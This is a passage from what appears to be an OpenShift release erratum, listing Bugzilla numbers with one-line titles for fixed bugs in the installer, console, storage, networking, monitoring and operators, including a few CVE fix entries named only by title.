Labeling the namespace should be a part of the installation flow or be clearer as a requirement 1866320 - [RHOCS Usability Study][Dashboard] Users were confused by Available Capacity and the Total Capacity 1866334 - [RHOCS Usability Study][Installation] On the Operator installation page, there’s no indication on which labels offer tooltip/help 1866340 - [RHOCS Usability Study][Dashboard] It was not clear why “No persistent storage alerts” was prominently displayed 1866343 - [RHOCS Usability Study][Dashboard] User wanted to know the time frame for Data Consumption, e.g I/O Operations 1866445 - kola --basic-qemu-scenarios scenario fail on ppc64le & s390x 1866482 - Few errors are seen when oc adm must-gather is run 1866605 - No metadata.generation set for build and buildconfig objects 1866873 - MCDDrainError "Drain failed on , updates may be blocked" missing rendered node name 1866901 - Deployment strategy for BMO allows multiple pods to run at the same time 1866925 - openshift-install destroy cluster should fail quickly when provided with invalid credentials on Azure. 1867165 - Cannot assign static address to baremetal install bootstrap vm 1867380 - When using webhooks in OCP 4.5 fails to rollout latest deploymentconfig 1867400 - [OCs 4.5]UI should not allow creation of second storagecluster of different mode in a single OCS 1867477 - HPA monitoring cpu utilization fails for deployments which have init containers 1867518 - [oc] oc should not print so many goroutines when ANY command fails 1867608 - ds/machine-config-daemon takes 100+ minutes to rollout on 250 node cluster 1867965 - OpenShift Console Deployment Edit overwrites deployment yaml 1868004 - opm index add appears to produce image with wrong registry server binary 1868065 - oc -o jsonpath prints possible warning / bug "Unable to decode server response into a Table" 1868104 - Baremetal actuator should not delete Machine objects 1868125 - opm index add is not creating an index with valid images when --permissive flag is added, the index is empty instead 1868384 - CLI does not save login credentials as expected when using the same username in multiple clusters 1868527 - OpenShift Storage using VMWare vSAN receives error "Failed to add disk 'scsi0:2'" when mounted pod is created on separate node 1868645 - After a disaster recovery pods a stuck in "NodeAffinity" state and not running 1868748 - ClusterProvisioningIP in baremetal platform has wrong JSON annotation 1868765 - [vsphere][ci] could not reserve an IP address: no available addresses 1868770 - catalogSource named "redhat-operators" deleted in a disconnected cluster 1868976 - Prometheus error opening query log file on EBS backed PVC 1869293 - The configmap name looks confusing in aide-ds pod logs 1869606 - crio's failing to delete a network namespace 1870337 - [sig-storage] Managed cluster should have no crashlooping recycler pods over four minutes 1870342 - [sig-scheduling] SchedulerPredicates [Serial] validates resource limits of pods that are allowed to run [Conformance] 1870373 - Ingress Operator reports available when DNS fails to provision 1870467 - D/DC Part of Helm / Operator Backed should not have HPA 1870728 - openshift-install creates expired ignition files from stale .openshift_install_state.json 1870800 - [4.6] Managed Column not appearing on Pods Details page 1871170 - e2e tests are needed to validate the functionality of the etcdctl container 1872001 - EtcdDiscoveryDomain no longer needed 1872095 - content are expanded to the whole line when only one column in table on Resource Details page 1872124 - Could not choose device type as "disk" or "part" when create localvolumeset from web console 1872128 - Can't run container with hostPort on ipv6 cluster 1872166 - 'Silences' link redirects to unexpected 'Alerts' view after creating a silence in the Developer perspective 1872251 - [aws-ebs-csi-driver] Verify job in CI doesn't check for vendor dir sanity 1872786 - Rules in kube-apiserver.rules are taking too long and consuming too much memory for Prometheus to evaluate them 1872821 - [DOC] Typo in Ansible Operator Tutorial 1872907 - Fail to create CR from generated Helm Base Operator 1872923 - Click "Cancel" button on the "initialization-resource" creation form page should send users to the "Operator details" page instead of "Install Operator" page (previous page) 1873007 - [downstream] failed to read config when running the operator-sdk in the home path 1873030 - Subscriptions without any candidate operators should cause resolution to fail 1873043 - Bump to latest available 1.19.x k8s 1873114 - Nodes goes into NotReady state (VMware) 1873288 - Changing Cluster-Wide Pull Secret Does Not Trigger Updates In Kubelet Filesystem 1873305 - Failed to power on /inspect node when using Redfish protocol 1873326 - Accessibility - The symbols e.g checkmark in the overview page has no text description, label, or other accessible information 1873480 - Accessibility - No text description, alt text, label, or other accessible information associated with the help icon: “?” button/icon in Developer Console ->Navigation 1873556 - [Openstack] HTTP_PROXY setting for NetworkManager-resolv-prepender not working 1873593 - MCO fails to cope with ContainerRuntimeConfig thas has a name > 63 characters 1874057 - Pod stuck in CreateContainerError - error msg="container_linux.go:348: starting container process caused \"chdir to cwd (\\"/mount-point\\") set in config.json failed: permission denied\"" 1874074 - [CNV] Windows 2019 Default Template Not Defaulting to Proper NIC/Storage Driver 1874192 - [RFE] "Create Backing Store" page doesn't allow to select already defined k8s secret as target bucket credentials when Google Cloud Storage is selected as a provider 1874240 - [vsphere] unable to deprovision - Runtime error list attached objects 1874248 - Include validation for vcenter host in the install-config 1874340 - vmware: NodeClockNotSynchronising alert is triggered in openshift cluster after upgrading form 4.4.16 to 4.5.6 1874583 - apiserver tries and fails to log an event when shutting down 1874584 - add retry for etcd errors in kube-apiserver 1874638 - Missing logging for nbctl daemon 1874736 - [downstream] no version info for the helm-operator 1874901 - add utm_source parameter to Red Hat Marketplace URLs for attribution 1874968 - Accessibility: The project selection drop down is a keyboard trap 1875247 - Dependency resolution error "found more than one head for channel" is unhelpful for users 1875516 - disabled scheduling is easy to miss in node page of OCP console 1875598 - machine status is Running for a master node which has been terminated from the console 1875806 - When creating a service of type "LoadBalancer" (Kuryr,OVN) communication through this loadbalancer failes after 2-5 minutes. 1876166 - need to be able to disable kube-apiserver connectivity checks 1876469 - Invalid doc link on yaml template schema description 1876701 - podCount specDescriptor change doesn't take effect on operand details page 1876815 - Installer uses the environment variable OS_CLOUD for manifest generation despite explicit prompt 1876935 - AWS volume snapshot is not deleted after the cluster is destroyed 1877071 - vSphere IPI - Nameserver limits were exceeded, some nameservers have been omitted 1877105 - add redfish to enabled_bios_interfaces 1877116 - e2e aws calico tests fail with rpc error: code = ResourceExhausted 1877273 - [OVN] EgressIP cannot fail over to available nodes after one egressIP node shutdown 1877648 - [sriov]VF from allocatable and capacity of node is incorrect when the policy is only 'rootDevices' 1877681 - Manually created PV can not be used 1877693 - dnsrecords specify recordTTL as 30 but the value is null in AWS Route 53 1877740 - RHCOS unable to get ip address during first boot 1877812 - [ROKS] IBM cloud failed to terminate OSDs when upgraded between internal builds of OCS 4.5 1877919 - panic in multus-admission-controller 1877924 - Cannot set BIOS config using Redfish with Dell iDracs 1878022 - Met imagestreamimport error when import the whole image repository 1878086 - OCP 4.6+OCS 4.6(multiple SC) Internal Mode- UI should populate the default "Filesystem Name" instead of providing a textbox, & the name should be validated 1878301 - [4.6] [UI] Unschedulable used to always be displayed when Node is Ready status 1878701 - After deleting and recreating a VM with same name, the VM events contain the events from the old VM 1878766 - CPU consumption on nodes is higher than the CPU count of the node. 1878772 - On the nodes there are up to 547 zombie processes caused by thanos and Prometheus. 1878823 - "oc adm release mirror" generating incomplete imageContentSources when using "--to" and "--to-release-image" 1878845 - 4.5 to 4.6.rc.4 upgrade failure: authentication operator health check connection refused for multitenant mode 1878900 - Installer complains about not enough vcpu for the baremetal flavor where generic bm flavor is being used 1878953 - RBAC error shows when normal user access pvc upload page 1878956 - oc api-resources does not include API version 1878972 - oc adm release mirror removes the architecture information 1879013 - [RFE]Improve CD-ROM interface selection 1879056 - UI should allow to change or unset the evictionStrategy 1879057 - [CSI Certificate Test] Test failed for CSI certification tests for CSIdriver openshift-storage.rbd.csi.ceph.com with RWX enabled 1879094 - RHCOS dhcp kernel parameters not working as expected 1879099 - Extra reboot during 4.5 -> 4.6 upgrade 1879244 - Error adding container to network "ipvlan-host-local": "master" field is required 1879248 - OLM Cert Dir for Webhooks does not align SDK/Kubebuilder 1879282 - Update OLM references to point to the OLM's new doc site 1879283 - panic after nil pointer dereference in pkg/daemon/update.go 1879365 - Overlapping, divergent openshift-cluster-storage-operator manifests 1879419 - [RFE]Improve boot source description for 'Container' and ‘URL’ 1879430 - openshift-object-counts quota is not dynamically updating as the resource is deleted. 1879565 - IPv6 installation fails on node-valid-hostname 1879777 - Overlapping, divergent openshift-machine-api namespace manifests 1879878 - Messages flooded in thanos-querier pod- oauth-proxy container: Authorization header does not start with 'Basic', skipping basic authentication in Log message in thanos-querier pod the oauth-proxy 1879930 - Annotations shouldn't be removed during object reconciliation 1879976 - No other channel visible from console 1880068 - image pruner is not aware of image policy annotation, StatefulSets, etc. 1880148 - dns daemonset rolls out slowly in large clusters 1880161 - Actuator Update calls should have fixed retry time 1880259 - additional network + OVN network installation failed 1880389 - Pipeline Runs with skipped Tasks incorrectly show Tasks as "Failed" 1880410 - Convert Pipeline Visualization node to SVG 1880417 - [vmware] Fail to boot with Secure Boot enabled, kernel lockdown denies iopl access to afterburn 1880443 - broken machine pool management on OpenStack 1880450 - Host failed to install because its installation stage joined took longer than expected 20m0s. 1880473 - IBM Cloudpak operators installation stuck "UpgradePending" with InstallPlan status updates failing due to size limitation 1880680 - [4.3] [Tigera plugin] - openshift-kube-proxy fails - Failed to execute iptables-restore: exit status 4 (iptables-restore v1.8.4 (nf_tables) 1880785 - CredentialsRequest missing description in oc explain 1880787 - No description for Provisioning CRD for oc explain 1880902 - need dnsPlocy set in crd ingresscontrollers 1880913 - [DeScheduler] - change loglevel from Info to Error when priority class given in the descheduler params is not present in the cluster 1881027 - Cluster installation fails at with error : the container name \"assisted-installer\" is already in use 1881046 - [OSP] openstack-cinder-csi-driver-operator doesn't contain required manifests and assets 1881155 - operator install authentication: Authentication require functional ingress which requires at least one schedulable and ready node 1881268 - Image uploading failed but wizard claim the source is available 1881322 - kube-scheduler not scheduling pods for certificates not renewed automatically after nodes restoration 1881347 - [v2v][ui]VM Import Wizard does not call Import provider cleanup 1881881 - unable to specify target port manually resulting in application not reachable 1881898 - misalignment of sub-title in quick start headers 1882022 - [vsphere][ipi] directory path is incomplete, terraform can't find the cluster 1882057 - Not able to select access modes for snapshot and clone 1882140 - No description for spec.kubeletConfig 1882176 - Master recovery instructions don't handle IP change well 1882191 - Installation fails against external resources which lack DNS Subject Alternative Name 1882209 - [ BateMetal IPI ] local coredns resolution not working 1882210 - [release 4.7] insights-operator: Fix bug in reflector not recovering from "Too large resource version" 1882268 - [e2e][automation]Add Integration Test for Snapshots 1882361 - Retrieve and expose the latest report for the cluster 1882485 - dns-node-resolver corrupts /etc/hosts if internal registry is not in use 1882556 - git:// protocol in origin tests is not currently proxied 1882569 - CNO: Replacing masters doesn't work for ovn-kubernetes 4.4 1882608 - Spot instance not getting created on AzureGovCloud 1882630 - Fstype is changed after deleting pv provisioned by localvolumeset instance 1882649 - IPI installer labels all images it uploads into glance as qcow2 1882653 - The Approval should display the Manual after the APPROVAL changed to Manual from the Automatic 1882658 - [RFE] Volume Snapshot is not listed under inventory in Project Details page 1882660 - Operators in a namespace should be installed together when approve one 1882667 - [ovn] br-ex Link not found when scale up RHEL worker 1882723 - [vsphere]Suggested mimimum value for providerspec not working 1882730 - z systems not reporting correct core count in recording rule 1882750 - [sig-api-machinery][Feature:APIServer][Late] kubelet terminates kube-apiserver gracefully 1882781 - nameserver= option to dracut creates extra NM connection profile 1882785 - Multi-Arch CI Jobs destroy libvirt network but occasionally leave it defined 1882844 - [IPI on vsphere] Executing 'openshift-installer destroy cluster' leaves installer tag categories in vsphere 1883371 - CVE-2020-26160 jwt-go: access restriction bypass vulnerability 1883388 - Bare Metal Hosts Details page doesn't show Mainitenance and Power On/Off status 1883422 - operator-sdk cleanup fail after installing operator with "run bundle" without installmode and og with ownnamespace 1883425 - Gather top installplans and their count 1883502 - Logging is broken due to mix of k8s.io/klog v1 and v2 1883523 - [sig-cli] oc adm must-gather runs successfully for audit logs [Suite:openshift/conformance/parallel] 1883538 - must gather report "cannot file manila/aws ebs/ovirt csi related namespaces and objects" error 1883560 - operator-registry image needs clean up in /tmp 1883563 - Creating duplicate namespace from create namespace modal breaks the UI 1883614 - [OCP 4.6] [UI] UI should not describe power cycle as "graceful" 1883642 - [sig-imageregistry][Feature:ImageTriggers][Serial] ImageStream admission TestImageStreamAdmitSpecUpdate 1883660 - e2e-metal-ipi CI job consistently failing on 4.4 1883765 - [user workload monitoring] improve latency of Thanos sidecar when streaming read requests 1883766 - [e2e][automation] Adjust tests for UI changes 1883768 - [user workload monitoring] The Prometheus operator should discard invalid TLS configurations 1883773 - opm alpha bundle build fails on win10 home 1883790 - revert "force cert rotation every couple days for development" in 4.7 1883803 - node pull secret feature is not working as expected 1883836 - Jenkins imagestream ubi8 and nodejs12 update 1883847 - The UI does not show checkbox for enable encryption at rest for OCS 1883853 - go list -m all does not work 1883905 - race condition in opm index add --overwrite-latest 1883946 - Understand why trident CSI pods are getting deleted by OCP 1884035 - Pods are illegally transitioning back to pending 1884041 - e2e should provide error info when minimum number of pods aren't ready in kube-system namespace 1884131 - oauth-proxy repository should run tests 1884165 - Repos should be disabled in -firstboot.service before OS extensions are applied 1884221 - IO becomes unhealthy due to a file change 1884258 - Node network alerts should work on ratio rather than absolute values 1884270 - Git clone does not support SCP-style ssh locations 1884334 - CVO marks an upgrade as failed when an operator takes more than 20 minutes to rollout 1884435 - vsphere - loopback is randomly not being added to resolver 1884565 - oauth-proxy crashes on invalid usage 1884584 - Kuryr controller continuously restarting due to unable to clean up Network Policy 1884613 - Create Instance of Prometheus from operator returns blank page for non cluster-admin users 1884628 - ovs-configuration service fails when the external network is configured on a tagged vlan on top of a bond device on a baremetal IPI deployment 1884629 - Visusally impaired user using screen reader not able to select Admin/Developer console options in drop down menu. 1884632 - Adding BYOK disk encryption through DES 1884654 - Utilization of a VMI is not populated 1884655 - KeyError on self._existing_vifs[port_id] 1884664 - Operator install page shows "installing..." instead of going to install status page 1884672 - Failed to inspect hardware. Reason: unable to start inspection: 'idrac' 1884691 - Installer blocks cloud-credential-operator manual mode on GCP and Azure 1884724 - Quick Start: Serverless quickstart doesn't match Operator install steps 1884739 - Node process segfaulted 1884824 - Update baremetal-operator libraries to k8s 1.19 1885002 - network kube-rbac-proxy scripts crashloop rather than non-crash looping 1885138 - Wrong detection of pending state in VM details 1885151 - [Cloud Team - Cluster API Provider Azure] Logging is broken due to mix of k8s.io/klog v1 and v2 1885165 - NoRunningOvnMaster alert falsely triggered 1885170 - Nil pointer when verifying images 1885173 - [e2e][automation] Add test for next run configuration feature 1885179 - oc image append fails on push (uploading a new layer) 1885213 - Vertical Pod Autoscaler (VPA) not working with DeploymentConfig 1885218 - [e2e][automation] Add virtctl to gating script 1885223 - Sync with upstream (fix panicking cluster-capacity binary) 1885235 - Prometheus: Logging is broken due to mix of k8s.io/klog v1 and v2 1885241 - kube-rbac-proxy: Logging is broken due to mix of k8s.io/klog v1 and v2 1885243 - prometheus-adapter: Logging is broken due to mix of k8s.io/klog v1 and v2 1885244 - prometheus-operator: Logging is broken due to mix of k8s.io/klog v1 and v2 1885246 - cluster-monitoring-operator: Logging is broken due to mix of k8s.io/klog v1 and v2 1885249 - openshift-state-metrics: Logging is broken due to mix of k8s.io/klog v1 and v2 1885308 - Supermicro nodes failed to boot via disk during installation when using IPMI and UEFI 1885315 - unit tests fail on slow disks 1885319 - Remove redundant use of group and kind of DataVolumeTemplate 1885343 - Console doesn't load in iOS Safari when using self-signed certificates 1885344 - 4.7 upgrade - dummy bug for 1880591 1885358 - add p&f configuration to protect openshift traffic 1885365 - MCO does not respect the install section of systemd files when enabling 1885376 - failed to initialize the cluster: Cluster operator marketplace is still updating 1885398 - CSV with only Webhook conversion can't be installed 1885403 - Some OLM events hide the underlying errors 1885414 - Need to disable HTX when not using HTTP/2 in order to preserve HTTP header name case 1885425 - opm index add cannot batch add multiple bundles that use skips 1885543 - node tuning operator builds and installs an unsigned RPM 1885644 - Panic output due to timeouts in openshift-apiserver 1885676 - [OCP 4.7]UI should fallback to minimal deployment only after total CPU < 30 || totalMemory < 72 GiB for initial deployment 1885702 - Cypress: Fix 'aria-hidden-focus' accesibility violations 1885706 - Cypress: Fix 'link-name' accesibility violation 1885761 - DNS fails to resolve in some pods 1885856 - Missing registry v1 protocol usage metric on telemetry 1885864 - Stalld service crashed under the worker node 1885930 - [release 4.7] Collect ServiceAccount statistics 1885940 - kuryr/demo image ping not working 1886007 - upgrade test with service type load balancer will never work 1886022 - Move range allocations to CRD's 1886028 - [BM][IPI] Failed to delete node after scale down 1886111 - UpdatingopenshiftStateMetricsFailed: DeploymentRollout of openshift-monitoring/openshift-state-metrics: got 1 unavailable replicas 1886134 - Need to set GODEBUG=x509ignoreCN=0 in initrd 1886154 - System roles are not present while trying to create new role binding through web console 1886166 - 1885517 Clone - Not needed for 4.7 - upgrade from 4.5->4.6 causes broadcast storm 1886168 - Remove Terminal Option for Windows Nodes 1886200 - greenwave / CVP is failing on bundle validations, cannot stage push 1886229 - Multipath support for RHCOS sysroot 1886294 - Unable to schedule a pod due to Insufficient ephemeral-storage 1886327 - Attempt to add a worker using bad roodDeviceHint: bmh and machine become Provisioned, no error in status 1886353 - [e2e][automation] kubevirt-gating job fails for a missing virtctl URL 1886397 - Move object-enum to console-shared 1886423 - New Affinities don't contain ID until saving 1886435 - Azure UPI uses deprecated command 'group deployment' 1886449 - p&f: add configuration to protect oauth server traffic 1886452 - layout options doesn't gets selected style on click i.e grey background 1886462 - IO doesn't recognize namespaces - 2 resources with the same name in 2 namespaces -> only 1 gets collected 1886488 - move e2e test off of nfs image from docker.io/gmontero/nfs-server:latest 1886524 - Change default terminal command for Windows Pods 1886553 - i/o timeout experienced from build02 when targeting CI test cluster during test execution 1886600 - panic: assignment to entry in nil map 1886620 - Application behind service load balancer with PDB is not disrupted 1886627 - Kube-apiserver pods restarting/reinitializing periodically 1886635 - CVE-2020-8563 kubernetes: Secret leaks in kube-controller-manager when using vSphere Provider 1886636 - Panic in machine-config-operator 1886749 - Removing network policy from namespace causes inability to access pods through loadbalancer. 1886751 - Gather MachineConfigPools 1886766 - PVC dropdown has 'Persistent Volume' Label 1886834 - ovn-cert is mandatory in both master and node daemonsets 1886848 - [OSP] machine instance-state annotation discrepancy with providerStatus.instanceState 1886861 - ordered-values.yaml not honored if values.schema.json provided 1886871 - Neutron ports created for hostNetworking pods 1886890 - Overwrite jenkins-agent-base imagestream 1886900 - Cluster-version operator fills logs with "Manifest: ..." spew 1886922 - [sig-network] pods should successfully create sandboxes by getting pod 1886973 - Local storage operator doesn't include correctly populate LocalVolumeDiscoveryResult in console 1886977 - [v2v]Incorrect VM Provider type displayed in UI while importing VMs through VMIO 1887010 - Imagepruner met error "Job has reached the specified backoff limit" which causes image registry degraded 1887026 - FC volume attach fails with “no fc disk found” error on OCP 4.6 PowerVM cluster 1887040 - [upgrade] ovs pod crash for rhel worker when upgarde from 4.5 to 4.6 1887046 - Event for LSO need update to avoid confusion 1887088 - cluster-node-tuning-operator refers to missing cluster-node-tuned image 1887375 - User should be able to specify volumeMode when creating pvc from web-console 1887380 - Unsupported access mode should not be available to select when creating pvc by aws-ebs-csi-driver(gp2-csi) from web-console 1887392 - openshift-apiserver: delegated authn/z should have ttl > metrics/healthz/readyz/openapi interval 1887428 - oauth-apiserver service should be monitored by prometheus 1887441 - ingress misconfiguration may break authentication but ingress operator keeps reporting "degraded: False" 1887454 - [sig-storage] In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (ext4)] volumes should store data 1887456 - It is impossible to attach the default NIC to a bridge with the latest version of OVN Kubernetes 1887465 - Deleted project is still referenced 1887472 - unable to edit application group for KSVC via gestures (shift+Drag) 1887488 - OCP 4.6: Topology Manager OpenShift E2E test fails: gu workload attached to SRIOV networks should let resource-aligned PODs have working SRIOV network interface 1887509 - Openshift-tests conformance TopologyManager tests run when Machine Config Operator is not installed on cluster 1887525 - Failures to set master HardwareDetails cannot easily be debugged 1887545 - 4.5 to 4.6 upgrade fails when external network is configured on a bond device: ovs-configuration service fails and node becomes unreachable 1887585 - ovn-masters stuck in crashloop after scale test 1887651 - [Internal Mode] Object gateway (RGW) in unknown state after OCP upgrade. 1887737 - Test TestImageRegistryRemovedWithImages is failing on e2e-vsphere-operator 1887740 - cannot install descheduler operator after uninstalling it 1887745 - API server is throwing 5xx error code for 42.11% of requests for LIST events 1887750 - oc explain localvolumediscovery returns empty description 1887751 - oc explain localvolumediscoveryresult returns empty description 1887778 - Add ContainerRuntimeConfig gatherer 1887783 - PVC upload cannot continue after approve the certificate 1887797 - [CNV][V2V] Default network type is bridge for interface bound to POD network in VMWare migration wizard 1887799 - User workload monitoring prometheus-config-reloader OOM 1887850 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install test is flaky 1887863 - Installer panics on invalid flavor 1887864 - Clean up dependencies to avoid invalid scan flagging 1887934 - TestForwardedHeaderPolicyAppend, TestForwardedHeaderPolicyReplace, and TestForwardedHeaderPolicyIfNone consistently fail because of case-sensitive comparison 1887936 - Kube-scheduler should be able to parse v1beta1 KubeSchedulerConfig 1888015 - workaround kubelet graceful termination of static pods bug 1888028 - prevent extra cycle in aggregated apiservers 1888036 - Operator details shows old CRD versions 1888041 - non-terminating pods are going from running to pending 1888072 - Setting Supermicro node to PXE boot via Redfish doesn't take affect 1888073 - Operator controller continuously busy looping 1888118 - Memory requests not specified for image registry operator 1888150 - Install Operand Form on OperatorHub is displaying unformatted text 1888172 - PR 209 didn't update the sample archive, but machineset and pdbs are now namespaced 1888227 - Failed to deploy some of container image on the recent OCP 4.6 nightly build 1888292 - Fix CVE-2015-7501 affecting agent-maven-3.5 1888311 - p&f: make SAR traffic from oauth and openshift apiserver exempt 1888363 - namespaces crash in dev 1888378 - [IPI on Azure] errors destroying cluster when Azure resource group was never created 1888381 - instance:node_network_receive_bytes_excluding_lo:rate1m value twice expected 1888464 - installer missing permission definitions for TagResources and UntagResources when installing in existing VPC 1888494 - imagepruner pod is error when image registry storage is not configured 1888565 - [OSP] machine-config-daemon-firstboot.service failed with "error reading osImageURL from rpm-ostree" 1888595 - cluster-policy-controller logs shows error which reads initial monitor sync has error 1888601 - The poddisruptionbudgets is using the operator service account, instead of gather 1888657 - oc doesn't know its name 1888663 - sdn starts after kube-apiserver, delay readyz until oauth-apiserver is reachable 1888671 - Document the Cloud Provider's ignore-volume-az setting 1888738 - quay.io/openshift/origin-must-gather:latest is not a multi-arch, manifest-list image 1888763 - at least one of these parameters (Vendor, DeviceID or PfNames) has to be defined in nicSelector in CR %s", cr.GetName() 1888827 - ovnkube-master may segfault when trying to add IPs to a nil address set 1888861 - need to pass dual-stack service CIDRs to kube-apiserver in dual-stack cluster 1888866 - AggregatedAPIDown permanently firing after removing APIService 1888870 - JS error when using autocomplete in YAML editor 1888874 - hover message are not shown for some properties 1888900 - align plugins versions 1888985 - Cypress: Fix 'Ensures buttons have discernible text' accesibility violation 1889213 - The error message of uploading failure is not clear enough 1889267 - Increase the time out for creating template and upload image in the terraform 1889348 - Project link should be removed from Application Details page, since it is inaccurate (Application Stages) 1889374 - Kiali feature won't work on fresh 4.6 cluster 1889388 - ListBundles returns incorrect replaces/skips when bundles have been added via semver-skippatch mode 1889420 - OCP failed to add vsphere disk when pod moved to new node during cluster upgrade 1889515 - Accessibility - The symbols e.g checkmark in the Node > overview page has no text description, label, or other accessible information 1889529 - [Init-CR annotation] Inline alert shows operand instance was needed still appearing after creating an Operand instance 1889540 - [4.5 upgrade][alert]CloudCredentialOperatorDown 1889577 - Resources are not shown on project workloads page 1889620 - [Azure] - Machineset not scaling when publicIP:true in disconnected Azure enviroment 1889630 - Scheduling disabled popovers are missing for Node status in Node Overview and Details pages 1889692 - Selected Capacity is showing wrong size 1889694 - usbguard fails to install as RHCOS extension due to missing libprotobuf.so.15 1889698 - When the user clicked cancel at the Create Storage Class confirmation dialog all the data from the Local volume set goes off 1889710 - Prometheus metrics on disk take more space compared to OCP 4.5 1889721 - opm index add semver-skippatch mode does not respect prerelease versions 1889724 - When LocalVolumeDiscovery CR is created form the LSO page User doesn't see the Disk tab 1889767 - [vsphere] Remove certificate from upi-installer image 1889779 - error when destroying a vSphere installation that failed early 1889787 - OCP is flooding the oVirt engine with auth errors 1889838 - race in Operator update after fix from bz1888073 1889852 - support new AWS regions ap-east-1, af-south-1, eu-south-1 1889863 - Router prints incorrect log message for namespace label selector 1889891 - Backport timecache LRU fix 1889912 - Drains can cause high CPU usage 1889921 - Reported Degraded=False Available=False pair does not make sense 1889928 - [e2e][automation] Add more tests for golden os 1889943 - EgressNetworkPolicy does not work when setting Allow rule to a dnsName 1890038 - Infrastructure status.platform not migrated to status.platformStatus causes warnings 1890074 - MCO extension kernel-headers is invalid 1890104 - with Serverless 1.10 version of trigger/subscription/channel/IMC is V1 as latest 1890130 - multitenant mode consistently fails CI 1890141 - move off docker.io images for build/image-eco/templates/jenkins e2e 1890145 - The mismatched of font size for Status Ready and Health Check secondary text 1890180 - FieldDependency x-descriptor doesn't support non-sibling fields 1890182 - DaemonSet with existing owner garbage collected 1890228 - AWS: destroy stuck on route53 hosted zone not found 1890235 - e2e: update Protractor's checkErrors logging 1890250 - workers may fail to join the cluster during an update from 4.5 1890256 - Replacing a master node on a baremetal IPI deployment gets stuck when deleting the machine of the unhealthy member 1890270 - External IP doesn't work if the IP address is not assigned to a node 1890361 - s390x: Generate new ostree rpm with fix for rootfs immutability 1890456 - [vsphere] mapi_instance_create_failed doesn't work on vsphere 1890467 - unable to edit an application without a service 1890472 - [Kuryr] Bulk port creation exception not completely formatted 1890494 - Error assigning Egress IP on GCP 1890530 - cluster-policy-controller doesn't gracefully terminate 1890630 - [Kuryr] Available port count not correctly calculated for alerts 1890671 - [SA] verify-image-signature using service account does not work 1890677 - 'oc image info' claims 'does not exist' for application/vnd.oci.image.manifest.v1+json manifest 1890808 - New etcd alerts need to be added to the monitoring stack 1890951 - Mirror of multiarch images together with cluster logging case problems. It doesn't sync the "overall" sha it syncs only the sub arch sha. 1890984 - Rename operator-webhook-config to sriov-operator-webhook-config 1890995 - wew-app should provide more insight into why image deployment failed 1891023 - ovn-kubernetes rbac proxy never starts waiting for an incorrect API call 1891047 - Helm chart fails to install using developer console because of TLS certificate error 1891068 - [sig-instrumentation] Prometheus when installed on the cluster shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured [Early] failing due to TargetDown alert from kube-scheduler 1891080 - [LSO] When Localvolumeset and SC is already created before OCS install Creation of LVD and LVS is skipped when user click created storage cluster from UI 1891108 - p&f: Increase the concurrency share of workload-low priority level 1891143 - CVO deadlocked while shutting down, shortly after fresh cluster install (metrics goroutine) 1891189 - [LSO] max device limit is accepting negative values. PVC is not getting created and no error is shown 1891314 - Display incompatible helm charts for installation (kubeVersion of cluster doesn't meet requirements of chart) 1891362 - Wrong metrics count for openshift_build_result_total 1891368 - fync should be fsync for etcdHighFsyncDurations alert's annotations.message 1891374 - fync should be fsync for etcdHighFsyncDurations critical alert's annotations.message 1891376 - Extra text in Cluster Utilization charts 1891419 - Wrong detail head on network policy detail page. 1891459 - Snapshot tests should report stderr of failed commands 1891498 - Other machine config pools do not show during update 1891543 - OpenShift 4.6/OSP install fails when node flavor has less than 25GB, even with dedicated storage 1891551 - Clusterautoscaler doesn't scale up as expected 1891552 - Handle missing labels as empty. 1891555 - The windows oc.exe binary does not have version metadata 1891559 - kuryr-cni cannot start new thread 1891614 - [mlx] testpmd fails inside OpenShift pod using DevX version 19.11 1891625 - [Release 4.7] Mutable LoadBalancer Scope 1891702 - installer get pending when additionalTrustBundle is added into install-config.yaml 1891716 - OVN cluster upgrade from 4.6.1 to 4.7 fails 1891740 - OperatorStatusChanged is noisy 1891758 - the authentication operator may spam DeploymentUpdated event endlessly 1891759 - Dockerfile builds cannot change /etc/pki/ca-trust 1891816 - [UPI] [OSP] control-plane.yml provisioning playbook fails on OSP 16.1 1891825 - Error message not very informative in case of mode mismatch 1891898 - The ClusterServiceVersion can define Webhooks that cannot be created. 1891951 - UI should show warning while creating pools with compression on 1891952 - [Release 4.7] Apps Domain Enhancement 1891993 - 4.5 to 4.6 upgrade doesn't remove deployments created by marketplace 1891995 - OperatorHub displaying old content 1891999 - Storage efficiency card showing wrong compression ratio 1892004 - OCP 4.6 opm on Ubuntu 18.04.4 - error /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.28' not found (required by ./opm) 1892167 - [SR-IOV] SriovNetworkNodePolicies apply ignoring the spec.nodeSelector. 1892198 - TypeError in 'Performance Profile' tab displayed for 'Performance Addon Operator' 1892288 - assisted install workflow creates excessive control-plane disruption 1892338 - HAProxyReloadFail alert only briefly fires in the event of a broken HAProxy config 1892358 - [e2e][automation] update feature gate for kubevirt-gating job 1892376 - Deleted netnamespace could not be re-created 1892390 - TestOverwrite/OverwriteBundle/DefaultBehavior in operator-registry is flaky 1892393 - TestListPackages is flaky 1892448 - MCDPivotError alert/metric missing 1892457 - NTO-shipped stalld needs to use FIFO for boosting. 1892467 - linuxptp-daemon crash 1892521 - [AWS] Startup bootstrap machine failed due to ignition file is missing in disconnected UPI env 1892653 - User is unable to create KafkaSource with v1beta 1892724 - VFS added to the list of devices of the nodeptpdevice CRD 1892799 - Mounting additionalTrustBundle in the operator 1893117 - Maintenance mode on vSphere blocks installation. 1893351 - TLS secrets are not able to edit on console. 1893362 - The ovs-xxxxx_openshift-sdn container does not terminate gracefully, slowing down reboots 1893386 - false-positive ReadyIngressNodes_NoReadyIngressNodes: Auth operator makes risky "worker" assumption when guessing about ingress availability 1893546 - Deploy using virtual media fails on node cleaning step 1893601 - overview filesystem utilization of OCP is showing the wrong values 1893645 - oc describe route SIGSEGV 1893648 - Ironic image building process is not compatible with UEFI secure boot 1893724 - OperatorHub generates incorrect RBAC 1893739 - Force deletion doesn't work for snapshots if snapshotclass is already deleted 1893776 - No useful metrics for image pull time available, making debugging issues there impossible 1893798 - Lots of error messages starting with "get namespace to enqueue Alertmanager instances failed" in the logs of prometheus-operator 1893832 - ErrorCount field is missing in baremetalhosts.metal3.io CRD 1893889 - disabled dropdown items in the pf dropdown component are skipped over and unannounced by JAWS 1893926 - Some "Dynamic PV (block volmode)" pattern storage e2e tests are wrongly skipped 1893944 - Wrong product name for Multicloud Object Gateway 1893953 - (release-4.7) Gather default StatefulSet configs 1893956 - Installation always fails at "failed 